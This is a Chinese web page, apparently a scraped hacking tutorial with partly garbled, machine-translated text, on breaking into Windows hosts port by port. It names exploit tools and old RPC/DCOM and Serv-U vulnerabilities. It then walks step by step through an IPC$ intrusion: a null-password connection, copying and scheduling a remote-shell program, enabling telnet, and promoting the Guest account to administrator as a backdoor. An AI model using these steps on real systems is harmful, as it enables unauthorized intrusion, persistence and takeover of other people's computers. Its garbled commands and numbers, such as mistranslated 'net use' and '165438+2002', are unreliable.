/Soft/html/21/74/2006012216483529 . shhtml
我查壹下端口135的端口描述:端口135主要用於使用RPC(遠程過程調用)協議,提供DCOM(分布式組件對象模型)服務。通過RPC,在計算機上運行的程序可以成功地在遠程計算機上執行代碼。使用DCOM,我們可以直接通過網絡進行通信,並且可以跨包括HTTP協議在內的各種網絡進行傳輸。
端口漏洞:相信去年有很多Windows 2000和Windows XP用戶感染了“沖擊波”病毒,該病毒利用RPC漏洞攻擊電腦。RPC本身在處理通過TCP/IP的消息交換時存在漏洞,這是由於對格式不正確的消息處理不當造成的。此漏洞將影響RPC和DCOM之間的接口,該接口偵聽端口135。
1:入侵端口139。
讓我們首先確定壹個具有139端口漏洞的主機。用掃描工具掃描!例如,SUPERSCAN是壹個端口掃描工具。假設現在我們得到了壹個有139端口漏洞的主機,我們需要使用命令nbtstat -a IP來獲取用戶的情況!我們現在需要做的是與另壹臺計算機建立資源共享連接。
使用了兩個NET命令,下面是這兩個命令的使用方法。
網觀?
功能:顯示指定計算機的域列表、計算機列表或* * *資源列表。?
命令格式:netview [\ \計算機名|/域[:域名]]?
參數介紹:?
& lt1 & gt;鍵入不帶參數的net view以顯示當前域中的計算機列表。?
& lt2 & gt\\computername指定要查看其* * *資源的計算機。?
& lt3 & gt/domain[:domainname]指定要查看其可用計算機的域?
凈用?
功能:連接電腦或斷開電腦與* * * *享受的資源的連接,或顯示電腦的連接信息。?
命令格式:net use[設備名| *] [\ \計算機名\共享名[\卷]]?
[密碼| *]][/用戶:[域名\]用戶名] [[/delete] |?
[/persistent:{yes | no}]]?
參數介紹:?
鍵入不帶參數的net use列出網絡連接。?
Devicename指定要連接的資源的名稱或要斷開的設備的名稱。?
\\computername\sharename服務器和* * *共享資源的名稱。?
密碼訪問* * *共享資源的密碼。?
*提示輸入密碼。/user指定要連接的另壹個用戶。?
域名指定了另壹個域。?
用戶名指定登錄用戶名。?
/home將用戶連接到他們的主目錄?
/delete取消指定的網絡連接。?
/persistent控制永久網絡連接的使用。?
C:\net使用\\IP
C:\net view \\IP
我們看到對方* * *已經很享受他的C、D、E碟了。
我們需要做的是使用NBTSTAT命令加載NBT緩存。
c:\ & gt;加載NBT緩存。
c:\ & gt;查看它是否被加載到NBT緩存中。
現在我們已經獲得了存在139端口漏洞的主機的IP地址和用戶名,是時候進入他的計算了。點擊開始-搜索-電腦,輸入剛找到的主機名稱,選擇搜索找到這臺電腦!雙擊進入,使用方法和線上領隊壹樣。
2: 4899端口入侵
使用4899過濾器。使用空密碼掃描機器。
3點80分入侵
對於sp3之前的機器,可以用webdav入侵;
對於bbs論壇,可以嘗試上傳漏洞(upfile.exe或dvup_delphi.exe)。
可以使用SQL進行註入。(啊,D的註射軟件)。
4: serv-u入侵(端口21)
對於低於5的系統。004,可以使用溢出入侵。(serv5004.exe)
對於5.1.0.0及以下版本的系統,您可以在本地升級您的權限。(servlocal.exe)
serv-u的MD5加密密碼可以用字典進行分解。(crack.vbs)
輸入壹個由serv-u加密的密碼(34位長),與字典文件(dict.txt)比較得到密碼。
5: 554端口
利用real554.exe入侵。
6: 6129端口
用DameWare6129.exe入侵。
7.端口6129
用DameWare6129.exe入侵。
8.系統漏洞
利用端口135和445,利用漏洞ms03026、ms03039、ms03049和ms04011,
進行溢出入侵。
9.3127等端口
妳可以用毀滅病毒打開端口,用nodoom.exe入侵。(在mydoomscan.exe中提供)。
10.其他入侵
用盧杉的入侵軟件入侵(WINNTAutoAttack.exe)。
典型的IPC$入侵
1.c:\ & gt;net use \ \ 127 . 0 . 0 . 1 \ IPC $ " "/user:" admin滴定儀"
這是壹個帶“streamer”的IP地址,用戶名是administrators,密碼是“empty”(如果妳夠生氣,可以用這個命令和127.0.0.1建立連接。
然後因為密碼是“空”的,所以不需要在第壹個引號中輸入,用戶名在第二個引號中。
,輸入administrators,該命令將成功完成。
2.c:\ & gt;復制srv.exe \ \ 127 . 0 . 0 . 1 \ admin $
先復制srv.exe,它會在Streamer的工具目錄下(這裏的$指的是admin用戶的。
C:\winnt\system32\,也可以用c$和d$表示驅動器C和驅動器D,具體看妳要復制到哪裏)。
3.c:\ & gt;凈時間\\127.0.0.1
查時間,發現127.0.0.1當前時間為165438+2002年3月淩晨0:00,命令成功完成。
4.c:\ & gt;srv.exe時間\ \ 127 . 0 . 0 . 11:05
用at命令啟動srv.exe(這裏設置的時間比主機時間快,不然怎麽啟動?
5.c:\ & gt;凈時間\\127.0.0.1
再查壹遍。妳找到時間了嗎?如果127.0.0.1的當前時間是2002年3月的11:05 am,那麽準備。
啟動以下命令。
6.c:\ & gt;遠程登錄127.0.0.1 99
這裏將使用Telnet命令。註意端口是99。Telnet默認端口為23,但是我們使用
是SRV在另壹臺電腦裏給我們設置了壹個99端口的Shell。
雖然我們可以Telnet,但是SRV是壹次性的,下次登錄的時候就會激活!所以我們戰鬥。
計算建立壹個遠程登錄服務!這將使用ntlm
7.c:\ & gt;復制ntlm.exe \ \ 127 . 0 . 0 . 1 \ admin $
使用Copy命令將ntlm.exe上傳到主機(ntlm.exe也在Streamer的工具目錄中)。
8.c:\ WINNT \ system32 & gt;ntlm
輸入ntlm startup(此處為c:\ win nt \ system32 >;指的是其他計算機,運行ntlm實際上是為了使這
壹個程序正在另壹臺計算機上運行)。當“DONE”出現時,表示已經正常啟動。然後制作
使用“net start Telnet”啟動Telnet服務!
9.Telnet 127.0.0.1,然後輸入用戶名和密碼進入對方。操作就像在DOS上操作壹樣。
就這麽簡單!那妳想做什麽?想幹嘛幹嘛,哈哈)
為了以防萬壹,我們將把來賓激活添加到管理組中。
10.c:\ & gt;網絡用戶來賓/活動:是
激活對方的客人用戶。
11.c:\ & gt;網友來賓1234
將Guest的密碼更改為1234,或者您想要設置的密碼。
12.c:\ & gt;net本地組管理員來賓/添加
將來賓更改為Administrator^_^(如果管理員密碼更改了,而來賓帳戶沒有更改,則下次我
學生可以使用來賓再次訪問這臺計算機)
/p?W=每個端口的入侵。% 20&;k =拉拉& ampaid=B0100019074